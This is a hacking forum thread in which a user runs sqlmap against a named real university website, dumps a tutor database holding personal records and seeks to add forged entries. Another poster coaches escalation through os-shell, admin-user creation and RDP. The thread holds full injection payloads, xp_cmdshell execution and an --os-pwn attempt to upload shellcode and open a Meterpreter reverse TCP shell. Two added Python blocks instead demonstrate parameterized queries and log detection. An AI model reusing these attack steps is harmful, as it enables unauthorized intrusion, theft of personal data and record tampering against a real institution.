
I found some databases on a website, which are as under:

web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
available databases [17]:
[*] Admission
[*] LIVE_AIOU
[*] master
[*] model
[*] msdb
[*] OBJ
[*] Online-Admission
[*] Pictures
[*] Queries
[*] ReportServer
[*] ReportServerTempDB
[*] Rollnoslips
[*] STATS
[*] tempdb
[*] Tutor_List
[*] Tutors
[*] UMC

Now I would like to know which database is connected to the webpage (www.aiou.edu.pk/Tutorship.asp).

And how will I hack or edit the database, if I want to add a user to the database?

related to an answer for: How to hack DBMS Sql server 2008?
closed with the note: answer selected

.:: Educational Purpose Only ::.

What is sqlmap?

Sqlmap is one of the most popular and powerful SQL injection automation tools out there. Given a vulnerable HTTP request URL, sqlmap can exploit the remote database and do a lot of hacking, like extracting database names, tables, columns, all the data in the tables, etc. It can even read and write files on the remote file system under certain conditions. Written in Python, it is one of the most powerful hacking tools out there. Sqlmap is the Metasploit of SQL injection.

Vulnerable URL:

http://www.site.com/section.php?id=51
It is prone to SQL injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the URL
http://www.site.com/section.php?id=51'

Hacking with sqlmap

In the console, try this:
sqlmap -u http://site.com/index.asp?id=765

Discover Databases

Once sqlmap confirms that a remote URL is vulnerable to SQL injection and is exploitable, the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.

$ sqlmap -u "http://www.site.com/section.php?id=51" --dbs

and the result should be 

[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: mywebdb
available databases [2]:
[*] information_schema
[*] mywebdb

Find tables in a particular database

Now it's time to find out what tables exist in a particular database. Let's say the database of interest over here is 'mywebdb'.

sqlmap -u "http://www.site.com/section.php?id=51" --tables -D mywebdb

And the output can be something similar to this:
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections                                                                                
........... more tables

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Let's say the table is 'users' and it contains the username and password.

sqlmap -u "http://www.site.com/section.php?id=51" --columns -D mywebdb -T users

The output can be something like this:

[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)                                                                                         
[12:17:45] [INFO] retrieved: name                                                                                            
[12:17:46] [INFO] retrieved: text                                                                                            
[12:17:47] [INFO] retrieved: password                                                                                        
[12:17:48] [INFO] retrieved: text                                                                                            

.......

[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+
So now the columns are clearly visible. Good job!

Get data from a table

Now comes the most interesting part: extracting the data from the table. The command would be

sqlmap -u "http://www.site.com/section.php?id=51" --dump -D mywebdb -T users

The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this:
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
OK, we did it.
Now you are asking how you will get the exact vulnerable "id=" parameter. Scan that site with some automated scanner; if it detects a SQL injection error then you will get a vulnerable link. Try on that. I hope this might be enough.
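The tutorial above tests for injection by appending a quote to the parameter and then lets sqlmap take over. The following Python example is added here; it is not part of the original post and not sqlmap's code. It reproduces the root cause (the request parameter concatenated into the SQL text) beside the parameterized query that fixes it, and runs the payload shapes sqlmap reports later in this thread (a bare quote, the boolean-based blind pair, a UNION) against both. The back end is an in-memory SQLite table standing in for the thread's SQL Server; the table, its rows and the function names are assumptions made for the example.

```python
import sqlite3

# Constructed stand-in for the back end. The thread's real target is Microsoft
# SQL Server; SQLite is used here only so the example runs offline. The table
# mirrors the columns the thread found (REG_NO, NAME, FNAME, REGION); the rows
# are made up.
SAMPLE_ROWS = [
    ("12-ABC-T0001", "Tutor One", "Father One", "REGION-A"),
    ("12-ABC-T0002", "Tutor Two", "Father Two", "REGION-B"),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tutor (REG_NO TEXT, NAME TEXT, FNAME TEXT, REGION TEXT)")
    conn.executemany("INSERT INTO tutor VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, reg_no):
    """The pattern the tutorial attacks: the request parameter is pasted into
    the SQL text, so a quote in the input changes the structure of the query."""
    sql = "SELECT REG_NO, NAME, REGION FROM tutor WHERE REG_NO = '" + reg_no + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, reg_no):
    """Hardened form: the driver binds the value, so it is only ever data."""
    sql = "SELECT REG_NO, NAME, REGION FROM tutor WHERE REG_NO = ?"
    return conn.execute(sql, (reg_no,)).fetchall()


def probe(conn, lookup, reg_no):
    """Run one lookup and report either the rows or the database error text,
    which is what the tutorial's id=51' test looks for in the HTTP response."""
    try:
        return {"rows": lookup(conn, reg_no), "error": None}
    except sqlite3.Error as exc:
        return {"rows": None, "error": str(exc)}


# Payload shapes taken from sqlmap's report later in this thread: a bare quote,
# the boolean-based blind true/false pair, and a UNION that reads another table
# (sqlite_master here, information_schema on the real back end).
PAYLOADS = {
    "quote": "12-ABC-T0001'",
    "blind_true": "12-ABC-T0001' AND 6179=6179 AND 'qLTs'='qLTs",
    "blind_false": "12-ABC-T0001' AND 6179=6180 AND 'qLTs'='qLTs",
    "union": "-1' UNION ALL SELECT name, sql, NULL FROM sqlite_master-- ",
}


def run_probes(lookup):
    """Return {payload name: number of rows returned, or -1 when the query errored}."""
    conn = make_db()
    results = {}
    for name, payload in PAYLOADS.items():
        outcome = probe(conn, lookup, payload)
        results[name] = -1 if outcome["error"] else len(outcome["rows"])
    return results


if __name__ == "__main__":
    print("vulnerable   :", run_probes(lookup_vulnerable))
    print("parameterized:", run_probes(lookup_parameterized))
```

For the vulnerable lookup the quote probe errors (the database error the tutorial's id=51' test looks for), the true/false blind pair returns 1 and 0 rows (the oracle sqlmap's boolean-based technique reads), and the UNION pulls a row out of sqlite_master; the parameterized lookup returns nothing for all four because the whole string is compared as a REG_NO value. One caveat: sqlite3's execute() refuses stacked statements, so the ;WAITFOR DELAY class in sqlmap's report cannot be reproduced here. SQL Server does accept stacked queries, which is what sqlmap's xp_cmdshell-based --os-shell path relies on.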

1 Answer

Best answer

That query has already been answered: use the --current-db switch in sqlmap, or the select db_name() query.

How to Hack a server through its DB a.k.a pwnage 

Well, first of all, edit your question and hide the website address, as we do not promote unauthorized hacking (it's bad).

As you shared a Windows server: although you did not share the connected user, I assume it's a SYSTEM account, which means that it has admin rights on the server, so there is nothing hard now, is there?

Just use the --os-shell switch in sqlmap to get yourself a command console. From there you can add a new user with admin rights, check if RDP is open, and if not, open it, or even spawn a PowerShell (refer to my PowerShell archive of hacks and techniques).

--os-shell: sqlmap will try to get an operating system command shell by exploiting the SQL injection.

With the above you can wreak havoc.

Play Safe

Enumerate DB Tutors and see the columns; it will show you the same columns as they are on the link you shared. That means the same DB is connecting with that page...

It's fairly simple to understand that.

By using the commands I got the column names and table names along with the database names, but here is the problem: to recognize the appropriate database for the said page. Which database is connected to that page? How will I find out the specific database for a specific webpage?

In the 17 databases, which one is the correct database for that page? I checked the Tutors and Tutor_List databases and their tables, but I could not find any ID or password column or table to edit their values, or to upload my own data into that database.

In the same database, how will I add my own information to retrieve it on the said page?

It's not compulsory that every database will have a username and password. Moreover, let's suppose you find one: did you find a login page on the website, from where you can get access?
You should follow this SQLi tutorial in one of our archives, and if you can find RDP, this guide to open RDP through the CLI might help you as well.

Did you try the os-shell switches I mentioned above?

One more thing: the ID and password stored INSIDE a database are the login information for the web-based site; database editing does not require that information. Enumerate which user you are able to access all the databases as. What rights do you have?

It shows only 98 records during the scan search; however, it has 5000 records. In the end it shows the following error.

[21:23:42] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 394 times

I used the following command:

sqlmap -u www.website.com/page.asp?REG_NO= -D Tutors -T TUTORD_TUTOR_WEB1 -C FNAME,REGION,NIC_NO --dump

In the result it shows only 98 records instead of 5000 records, and in the end line it says

[21:23:42] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 394 times

What is the matter?

(Read the bold values; those are my elements.)

My Database is 

[*] Tutors

and

[10 tables]
+-------------------+
| COURSE_03_12_15   |
| COURSE_03_12_15   |
| COURSE_12_11_13   |
| DISTRICT          |
| TUTORD_TUTOR_WEB1 |
| TUTORD_TUTOR_WEB1 |
| TUTOR_03_12_15    |
| TUTOR_03_12_15    |
| TUTOR_12_11_13    |
| dtproperties      |
+-------------------+

and

[18 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| ADDRESS       | nvarchar |
| BATCH_NO      | float    |
| COURSE        | nvarchar |
| DESIGNATION   | nvarchar |
| DISTRICT      | nvarchar |
| FNAME         | nvarchar |
| FORM_NO       | float    |
| GENDER        | nvarchar |
| NAME          | nvarchar |
| NIC_NO        | nvarchar |
| ODISTRICT     | nvarchar |
| OFFICIAL_ADD1 | nvarchar |
| OTEHSIL       | nvarchar |
| PHONE         | nvarchar |
| QUALIFICATION | nvarchar |
| REG_NO        | nvarchar |
| REGION        | nvarchar |
| TEHSIL        | nvarchar |
+---------------+----------+

NOW

This is the data which I received from the database, and it is also available on the said web page.

| ABDUL ALI                   | MUHAMAMD ALI               | PESHAWAR       | 10-PLR-T0261 |
| ABDUL ALI KHAN              | MUSHTAQ ALI KHAN           | SAIDU SHARIF   | 12-NMD-T0035 |
| ABDUL ALIM                  | UMAR DIN                   | KARACHI        | 06-SKI-T0035 |
| ABDUL AMIN                  | ABDUL MAJEED               | SAIDU SHARIF   | 07-NBR-T0003 |
| ABDUL ANIS KHAN             | ABDUL RAHIM KHAN           | KARACHI        | 02-SKI-T0037 |
| ABDUL ATIQUE                | ABDUL REHMAN               | D.G.KHAN       | 12-PMH-T0328 |
+-----------------------------+----------------------------+----------------+--------------+

and so on.

Finally I got the right place, the right database for the right web page.

Now we have 04 databases for the (http://www.aiou.edu.pk/Tutorship.asp) web page, which has all its given information.

04 databases are working under this web page:

(http://www.aiou.edu.pk/Tutorship.asp)

+---------------+----------+
| Column        | Type     |
+---------------+----------+
| FNAME         | nvarchar |
| NAME          | nvarchar |
| REG_NO        | nvarchar |
| REGION        | nvarchar |
+---------------+----------+

Check the details

http://www.aiou.edu.pk/TutorDetail.asp?REG_NO=12-PMH-T0328

The result of the said link is available on the web page. I just pasted it here to show you.

Now check this:

http://www.aiou.edu.pk/TutorDetail.asp?REG_NO=

Here is an empty place.

I told you what I have. NOW WHAT I WANT:

I want to upload my own information, like name, fname, etc., on that page with a unique number, i.e. 00-PCP-T1234.

When someone visits http://www.aiou.edu.pk/TutorDetail.asp?REG_NO=00-PCP-T1234, then my given data should show. Now I need to gain access to reach those databases to add my information in their databases. That's it.

The unique number is your REG_NO. Anyway, you need to pwn a shell with this syntax:

sqlmap -u TARGET -D DBNAME --sql-shell

Read the help for the switch --sql-shell... and you didn't share your feedback after --os-shell?

You can even run the --os-cmd=OSCMD switch to get system-level commands. That way, why don't you just turn on RDP and get GUI access? The options are endless.

The only reason you are not able to grasp this is because you just want to achieve something sinister and your aim is NOT to learn anything. Anyway, I told you everything there is to it.

Dear Sir, my AIM and purpose is not to harm or damage; my aim is only to learn, that's it, Sir. I used all of the commands as you gave me:

1. --os-shell
2. --os-cmd=PSCMD

3. sqlmap -u TARGET -D DBNAME --sql-shell

I found different results for all of them.

[*] starting at 02:45:17

[02:45:17] [WARNING] provided value for parameter 'REG_NO' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:45:17] [INFO] resuming back-end DBMS 'microsoft sql server'
[02:45:17] [INFO] testing connection to the target URL

Q. Why does it say REG_NO is empty, and to use valid parameter values?

=============================================================
Command No.1 and its result is as under:

root@kali:~# sqlmap -u Target -D DB --os-shell
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.6.4#dev}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:41:27

[02:41:27] [WARNING] provided value for parameter 'REG_NO' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:41:27] [INFO] resuming back-end DBMS 'microsoft sql server'
[02:41:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: REG_NO (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: REG_NO=10-KGT-T0010' AND 6179=6179 AND 'qLTs'='qLTs

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: REG_NO=10-KGT-T0010';WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: REG_NO=10-KGT-T0010' WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: REG_NO=-1385' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(83)+CHAR(108)+CHAR(75)+CHAR(66)+CHAR(118)+CHAR(115)+CHAR(74)+CHAR(118)+CHAR(73)+CHAR(102)+CHAR(87)+CHAR(90)+CHAR(105)+CHAR(89)+CHAR(111)+CHAR(71)+CHAR(116)+CHAR(121)+CHAR(76)+CHAR(113)+CHAR(86)+CHAR(68)+CHAR(81)+CHAR(79)+CHAR(97)+CHAR(68)+CHAR(85)+CHAR(97)+CHAR(113)+CHAR(84)+CHAR(118)+CHAR(76)+CHAR(77)+CHAR(105)+CHAR(70)+CHAR(79)+CHAR(66)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL-- ApLS
---
[02:41:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
[02:41:32] [INFO] testing if current user is DBA
[02:41:33] [INFO] testing if xp_cmdshell extended procedure is usable
[02:41:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:41:41] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[02:41:59] [ERROR] unable to retrieve xp_cmdshell output
[02:41:59] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[02:41:59] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>




Now what should I do next when I am in os-shell>?


====================================================================

Command No.2 and its result is as under

root@kali:~# sqlmap -u www.aiou.edu.pk/TutorDetail.asp?REG_NO= -D Tutors --os-cmd=OSCMD
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.6.4#dev}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:53:20

[02:53:21] [WARNING] provided value for parameter 'REG_NO' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:53:21] [INFO] resuming back-end DBMS 'microsoft sql server'
[02:53:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: REG_NO (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: REG_NO=10-KGT-T0010' AND 6179=6179 AND 'qLTs'='qLTs

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: REG_NO=10-KGT-T0010';WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: REG_NO=10-KGT-T0010' WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: REG_NO=-1385' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(83)+CHAR(108)+CHAR(75)+CHAR(66)+CHAR(118)+CHAR(115)+CHAR(74)+CHAR(118)+CHAR(73)+CHAR(102)+CHAR(87)+CHAR(90)+CHAR(105)+CHAR(89)+CHAR(111)+CHAR(71)+CHAR(116)+CHAR(121)+CHAR(76)+CHAR(113)+CHAR(86)+CHAR(68)+CHAR(81)+CHAR(79)+CHAR(97)+CHAR(68)+CHAR(85)+CHAR(97)+CHAR(113)+CHAR(84)+CHAR(118)+CHAR(76)+CHAR(77)+CHAR(105)+CHAR(70)+CHAR(79)+CHAR(66)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL-- ApLS
---
[02:53:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
[02:53:25] [INFO] testing if current user is DBA
[02:53:26] [INFO] testing if xp_cmdshell extended procedure is usable
[02:53:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:53:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[02:53:51] [ERROR] unable to retrieve xp_cmdshell output
do you want to retrieve the command standard output? [Y/n/a] Y
[02:53:54] [INFO] retrieved:
[02:53:55] [INFO] retrieved:
[02:54:01] [INFO] adjusting time delay to 2 seconds due to good response times
0
No output
[02:54:04] [INFO] cleaning up the database management system
do you want to remove UDF 'master..new_xp_cmdshell'? [Y/n] Y
[02:54:07] [INFO] database management system cleanup finished
[02:54:07] [WARNING] remember that UDF dynamic-link library files saved on the file system can only be deleted manually
[02:54:07] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[02:54:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aiou.edu.pk'

[*] shutting down at 02:54:07

root@kali:~#

=============================================================================
Command No.3 and its result is as under:


root@kali:~# sqlmap -u www.aiou.edu.pk/TutorDetail.asp?REG_NO= -D Tutors --sql-shell
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.6.4#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:30:22

[02:30:22] [WARNING] provided value for parameter 'REG_NO' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:30:22] [INFO] resuming back-end DBMS 'microsoft sql server'
[02:30:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: REG_NO (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: REG_NO=10-KGT-T0010' AND 6179=6179 AND 'qLTs'='qLTs

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: REG_NO=10-KGT-T0010';WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: REG_NO=10-KGT-T0010' WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: REG_NO=-1385' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(83)+CHAR(108)+CHAR(75)+CHAR(66)+CHAR(118)+CHAR(115)+CHAR(74)+CHAR(118)+CHAR(73)+CHAR(102)+CHAR(87)+CHAR(90)+CHAR(105)+CHAR(89)+CHAR(111)+CHAR(71)+CHAR(116)+CHAR(121)+CHAR(76)+CHAR(113)+CHAR(86)+CHAR(68)+CHAR(81)+CHAR(79)+CHAR(97)+CHAR(68)+CHAR(85)+CHAR(97)+CHAR(113)+CHAR(84)+CHAR(118)+CHAR(76)+CHAR(77)+CHAR(105)+CHAR(70)+CHAR(79)+CHAR(66)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL-- ApLS
---
[02:30:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
[02:30:48] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell>


NOW WHAT TO DO NEXT? Now I am in sql-shell> and os-shell>.
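The four injection points sqlmap resumed in the output above (boolean-based blind, stacked queries, time-based blind, UNION) are also what the attack looks like from the server side, together with the HTTP 500s reported earlier in this thread. The following Python example is added here; it is not from the original thread and not sqlmap's code. It parses IIS W3C-format log lines, URL-decodes each query parameter, flags the payload shapes shown above and aggregates per client IP. The log lines are constructed (IPs, timestamps and User-Agent strings are made up); the query strings reuse the payload shapes from sqlmap's report, percent-encoded the way IIS records them.

```python
import re
from urllib.parse import parse_qsl

# Constructed IIS W3C log excerpt. Field order follows the #Fields header; the
# IPs, timestamps and User-Agent strings are made up, the query strings reuse
# the payload shapes from sqlmap's report above.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2017-06-01 02:41:27 10.0.0.5 GET /TutorDetail.asp REG_NO=10-KGT-T0010 80 - 203.0.113.7 Mozilla/5.0 200
2017-06-01 02:41:28 10.0.0.5 GET /TutorDetail.asp REG_NO=10-KGT-T0010%27 80 - 203.0.113.7 sqlmap/1.1.6.4 500
2017-06-01 02:41:29 10.0.0.5 GET /TutorDetail.asp REG_NO=10-KGT-T0010%27+AND+6179%3D6179+AND+%27qLTs%27%3D%27qLTs 80 - 203.0.113.7 sqlmap/1.1.6.4 200
2017-06-01 02:41:31 10.0.0.5 GET /TutorDetail.asp REG_NO=10-KGT-T0010%27%3BWAITFOR+DELAY+%270%3A0%3A5%27-- 80 - 203.0.113.7 sqlmap/1.1.6.4 200
2017-06-01 02:41:32 10.0.0.5 GET /TutorDetail.asp REG_NO=-1385%27+UNION+ALL+SELECT+NULL%2CNULL%2CCHAR%28113%29%2BCHAR%28113%29%2CNULL--+ApLS 80 - 203.0.113.7 sqlmap/1.1.6.4 200
2017-06-01 02:41:33 10.0.0.5 GET /TutorDetail.asp REG_NO=12-PMH-T0328 80 - 198.51.100.20 Mozilla/5.0 200
2017-06-01 02:41:34 10.0.0.5 GET /Tutorship.asp - 80 - 198.51.100.20 Mozilla/5.0 200
"""

# Signatures matched against each URL-decoded parameter value, named after the
# sqlmap technique that produces them. The numbers in the tautology and the
# CHAR() sequence change from run to run, so the patterns match the shape only.
SIGNATURES = {
    "quote": re.compile(r"'"),
    "boolean": re.compile(r"\b(AND|OR)\s+\d+\s*=\s*\d+", re.I),
    "time_based": re.compile(r"\bWAITFOR\s+DELAY\b", re.I),
    "stacked": re.compile(r";\s*(WAITFOR|EXEC|DECLARE|INSERT|UPDATE|DELETE|SELECT)\b", re.I),
    "union": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "char_concat": re.compile(r"CHAR\(\d+\)\s*\+\s*CHAR\(\d+\)", re.I),
}


def parse_w3c(log_text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = None
    for raw in log_text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]
            continue
        if not raw or raw.startswith("#") or fields is None:
            continue
        parts = raw.split()
        if len(parts) != len(fields):
            continue  # malformed line; a real collector would count these
        yield dict(zip(fields, parts))


def classify(value):
    """Return the set of signature names that match one decoded parameter value."""
    return {name for name, rx in SIGNATURES.items() if rx.search(value)}


def scan(log_text):
    """Aggregate per client IP: request count, flagged requests, HTTP 500s,
    the techniques seen and whether a sqlmap User-Agent appeared."""
    summary = {}
    for rec in parse_w3c(log_text):
        s = summary.setdefault(rec["c-ip"], {"requests": 0, "flagged": 0, "status_500": 0,
                                             "techniques": set(), "sqlmap_ua": False})
        s["requests"] += 1
        if rec["sc-status"] == "500":
            s["status_500"] += 1
        if "sqlmap" in rec["cs(User-Agent)"].lower():
            s["sqlmap_ua"] = True
        if rec["cs-uri-query"] == "-":
            continue  # IIS writes '-' when there is no query string
        hits = set()
        for _, value in parse_qsl(rec["cs-uri-query"], keep_blank_values=True):
            hits |= classify(value)
        if hits:
            s["flagged"] += 1
            s["techniques"] |= hits
    for s in summary.values():
        s["techniques"] = sorted(s["techniques"])
    return summary


if __name__ == "__main__":
    for ip, s in scan(SAMPLE_LOG).items():
        print(ip, s)
```

For the scanning IP, scan() reports five requests of which four carry payloads, one HTTP 500 (the bare-quote probe, which on SQL Server produces the "unclosed quotation mark" error), all six signature classes and a sqlmap User-Agent; the other client stays clean, and a legitimate REG_NO such as 12-PMH-T0328 matches nothing. The User-Agent is the weakest signal (sqlmap has --random-agent), so the durable indicators are a quote followed by SQL keywords, WAITFOR DELAY, and a burst of 500s from one source against one parameter, which is exactly the "500 (Internal Server Error) - 394 times" line quoted earlier in the thread.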

In addition, I found more. I am going to show you, and its result.

--os-pwn
and
 --os-smbrelay   

I found the following results when I applied these commands. The results are as under:

====================================================
--os-pwn: I chose

[1] TCP: Metasploit Framework (default)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y

I chose Y.

Then it shows the following.

which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> Y
[04:17:14] [WARNING] invalid value, only digits are allowed
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection


I chose 1 because it is the default.
[1] Reverse TCP: Connect back from the database host to this machine (default)

Then I typed my local IP:
what is the local address? [Enter for '192.168.180.128' (detected)] 192.168.180.128

Then the port, 64899.

Then I used the payload as default (Meterpreter):
[1] Meterpreter (default)

then

> 1
[04:19:30] [INFO] creation in progress ................................ done
[04:20:02] [INFO] uploading shellcodeexec to 'C:/Program Files/Microsoft SQL Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpseyvfy.exe'
[04:20:02] [INFO] using PowerShell to write the binary file content to file 'C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpseyvfy.exe'
[04:20:02] [CRITICAL] page not found (404)
[04:20:02] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times

NOW WHAT?

In the next post I will show you --os-smbrelay,

but first help me with --os-pwn and its options.

Check the following; I used VNC.



===============================

[04:23:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[04:23:08] [INFO] testing if current user is DBA
[04:23:11] [INFO] testing if xp_cmdshell extended procedure is usable
[04:23:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[04:23:51] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[04:23:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[04:23:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[04:23:57] [ERROR] unable to retrieve xp_cmdshell output
[04:23:57] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
